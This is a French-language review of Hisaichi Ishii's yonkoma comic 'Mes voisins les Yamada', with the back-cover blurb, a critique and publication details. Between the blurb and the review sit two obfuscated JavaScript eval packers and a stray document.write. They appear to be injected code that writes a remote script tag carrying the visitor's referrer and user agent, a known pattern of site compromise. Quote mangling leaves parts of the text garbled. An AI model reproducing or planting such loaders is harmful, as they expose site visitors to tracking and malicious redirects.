Mes voisins les Yamada

“Nos voisins les Yamada… Une famille japonaise typique, document.write(“”); défiant avec entrain (plus que succès) les petits tracas du quotidien. Entre boulot, cuisine, scolarité, retraite et relations humaines, leurs “aventures domestiques” épinglent avec mordant les travers d’une société où les codes n’existent que pour mieux être détournés. Suivez Matsuko, Takashi, Noboru, Nonoko et Shige au coeur d’un univers où l’humour se mêle à l’absurde, pour éclairer différemment le Pays du Soleil levant.” [Texte du rebat intérieur de couveture, tome 2]
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyttd|var|u0026u|referrer|sftnt||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shsaa|var|u0026u|referrer|nedss||js|php’.split(‘|’),0,{}))

Mes voisins les Yamada [?????? ???????, H?hokekyo Tonari no Yamada-kun] est un “comic strip” japonais qui a été publié dans le quotidien Asahi Shinbun entre 1991 et 1997 avant d’être compilé en volumes par Tokuma Shoten en 1999. Dessiné par le mangaka Hisaichi ISHII, Mes voisins les Yamada n’est pas un manga a proprement parler mais plutôt un “yonkoma”—c’est-à-dire une histoire humoristique en quatre cases qui se présente à la verticale (contrairement à l’Occident où les “comic strip” sont horizontales)—et est surtout connu pour avoir été adapté en animation en 1999 par le Studio Ghibli sous la direction de Isao Takahata. On y raconte la vie quotidienne (et les situations saugrenues qui en découle) d’une famille japonaise et de son entourage.

J’ai découvert ce “manga” à la bibliothèque avec grande surprise: car j’ignorais qu’une traduction française était disponible. Je n’ai lu qu’une partie du second volume et j’ai malheureusement été un peu décu. Non pas à cause du style simple et même carrément minimaliste—ça c’est pas surprenant étant donné qu’il s’agit d’un “comic strip”—mais surtout à cause des histoires. Ce genre d’humour satirique se lit assez bien mais on s’en lasse rapidement. D’abord c’est une volumineuse lecture, et puis l’humour est un peu bête, les gags parfois répétitifs et souvent plats (sans doute quelque chose se perd-t-il dans la traduction). Seulement cinq pourcent des gags sont vraiment drôles. On se retrouve tout de même tous un peu dans ces personnages loufoques. C’est quand même amusant à lire et je le recommande à ceux qui sont curieux de découvrir un style qui est très populaire au Japon.

Mes voisins les Yamada, par Hisaichi ISHII. Delcourt (Label Akata, Coll. Shampooing), 2009. 3 vols., B&W, 21 x 14.6 cm, 350 pgs ch. 15.00 € ch. / $24.95 Can ch. Recommandé pour adolescents (14+). ISBN: 978-2-7560-1451-7 (vol. 1), 978-2-7560-1452-4 (vol. 2), 978-2-7560-1453-1 (vol. 3).
Mes voisins, les Yamada © 1999 Hisaichi Ishii • Studio Ghibli. All rights reserved. © 2009 Guy Delcourt Productions pour l’édition française.